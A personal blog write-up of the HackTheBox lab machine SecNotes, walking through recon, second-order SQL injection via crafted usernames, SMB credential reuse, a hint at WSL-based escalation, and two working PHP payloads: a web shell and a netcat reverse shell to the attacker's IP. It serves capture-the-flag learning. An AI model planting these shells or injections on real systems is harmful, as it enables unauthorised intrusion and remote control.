< Back

SecNotes - WriteUp

Posted on: 19 Jan 2019 | HackTheBox

‌ ‌

Here’s my solution for the HackTheBox machine SecNotes.

This is my 2nd WriteUp but the first I can publish. Which is pretty exciting.

The box had a quite unique twist and I learned a lot doing it. As you can see it was an medium rated machine with 30 points. SecNotes-Banner Let’s get started.

Index


External Recon

As usual we start with our nmap scan and see what we are dealing with:

nmap -sC -sV 10.10.10.97

PORT    STATE SERVICE      VERSION
80/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
445/tcp open  microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h40m00s, deviation: 4h37m08s, median: 0s
| smb-os-discovery:
|   OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: SECNOTES
|   NetBIOS computer name: SECNOTES\x00
|   Workgroup: HTB\x00
|_  System time: 2019-01-04T05:21:46-08:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-01-04 14:21:48
|_  start_date: N/A

So Port 80 & 445 are open. While I explored those, I scanned all TCP Ports to see if there’s more to find. Nmap by default just checks the Top1000.

Spoileralert: I found Port 8808 to be open also.

[Top]

Explore

Port 445

Nothing too interessting.

Port 8808

Just the default IIS Webserver Page. Nothing fancy here.

Port 80

We find a login page. I first tried to login with the usual supects.

Not so big

admin:admin
admin:toor
root:toor
etc.

No luck so far. But if you look closely, there’s an option to register an account. Let’s try that.

Not so big

That worked - let’s login.

Not so big

We see a page where we are able to take up to 3 notes and store them and also delete them. Also we get another piece of intel. Can you spot it? Take your time and try to find it.

Correct it’s the name tyler in the email-address. Perhaps this could be usefull later.

I checked all the functions the site had to offer, and noticed this URL when deleting a note:

http://10.10.10.97/home.php?action=delete&id=31

We can see the home.php script has a parameter to offer. I started playing with it. With wfuzz to find other parameters but had no luck finding a vulnerability there.

So I started up gobuster and found a file called db.php. Based on the name db is assumed that all our notes are stored in a database.

As there was nothing else I could find, I thought maybe some kind of SQLi is possible. Although I am not very experienced with SQLi I jumped right in and fired up SQLMap.

I won’t give you all the things I tried. I spent at least and hour or two but nothing came up. So I was stuck. After checking the HackTheBox forums for a hint, someone mentioned that his type of vulnerability was part of a retired box called nightmare.

I had the video-solution of nightmare, created by the awesome guy ippsec, already downloaded on my laptop. So I watched it again just to learn it was indeed about SQLi. Specificaly 2nd order SQLi. You should watch (and subscribe!) his video for a better explaination on this type of SQLi.


So let’s try some handcrafted SQLi.

[Top]

Weaponize

So, we could login with our regular user. First, let’s logout and create another user like so:

Not so big

After logging in we get an error!

Not so big

Which means, something broke because of the single-quote we had in our username. Let’s try to fix that. I commented everything out after the quote.

Not so big

Nice - we are able to login again. But wait, something is wrong here:

Not so big

We can see the note from the legitmate x41 User. We can read other users content!

This works because the SQL query to get the notes from the database looks probably like this:

select * from NOTES where USERNAME like '$User'

Keep those two single-quotes in mind.

Our SQLi did this to the statement:

select * from NOTES where USERNAME like 'x41'-- -'

As you can see, there are now three single-quotes. The 2nd one was part of the name we provided. But as we commented the original one out, we have now a valid statement with the already existing useraccount x41 (without the single-quote).

Nice! You know what we need to do next, do you?! ;)

[Top]

Exploit

Let’s create another user, hmm, let’s target tyler as he seems to be an admin of some sorts.

Not so big

And after logging in we find something nice in his notes. :)

Not so big

Now we can try to connect to the SMB share with those credentials.

And there’s the webroot the IIS Server.

Not so big

The note says, this is supposed to be the new website. The old one is based on php. Perhaps PHP is working on there too?

I uploaded a simple php command-shell and tried it.

<?php
if (isset($_REQUEST['fexec'])) {
  echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
};
?>

Not so big

=) Let’s get a reverse-shell!

At first I used nc.exe, but soon remembered it’s a Windows 10 box, running a 64Bit OS. If you start a 32Bit executable on a 64Bit OS, you get a different environment. A different registry and some programs won’t work. So I switched to nc64.exe.

<?php
  echo "Cyber PewPew";

  $last_command = system('nc64.exe 10.10.15.140 4445 -e cmd.exe',$ret);

  echo $last_command;

  echo "\n ------------------------------- \n";
  echo $ret;
?>

Not so big

We’ve got a shell AND….

[Top]

User Flag

…sure enough user.txt! :)

C:\inetpub\new-site>whoami
whoami
secnotes\tyler

C:\Users\tyler\Desktop>dir
 Directory of C:\Users\tyler\Desktop

08/19/2018  08:25 AM                34 user.txt

[Top]

Interal Recon

While searching around on the box to find clues on the next step to root.txt, I noticed an Ubuntu archive and a Distros folder. I remember wondering “Why is this stuff here?” But didn’t put 1 + 1 together.

I had to go back to the forums again to seek out for help. Where someone said:

“What OS Version have you found - there’s a specific new feature in this.”

Because I couldn’t think about anything from the top of my head, I googled for the releasenotes. And then it just starred at me:

"Windows Subsystem for Linux"

I spent about an hour or so just to learn about this feature, and the tools around it. After that I used wsl.exe and wsl.config to start up the preconfigued Ubuntu Machine.

Hoping for a quick win for root. Perhaps I can read the Windows filesystem from it without ACLs messing with me?

[Top]

Privilege Escalation

“Sadly” that wasn’t possible. I had to search a lot, after a little nudge I headed into the right direction. I just failed to stick to my routine. I guessed my next step instead of doing internal recon properly.

If I had done it, I immediately would have tried this:

Not so big

[Top]

Root Flag

From here it just was connecting to the SMB share to get the root flag. I didn’t bother getting a propper shell as admin, which I leave up to the reader how to do that. ;) (Hint: Impacket)

Not so big

[Top]

Lessons Learned

First, my Enumeration failed me and I didn’t followed my initial thoughts about the Ubuntu folders. On the other hand I got the SQLi right, found the hint about tyler right away. And I learned about wsl. Which is a difficult thing to monitor for blueteams.

While researching this feature I discovered this video from Checkpoint. I recommend watching it.

That’s it for today. Have a nice one!
x41

[Top]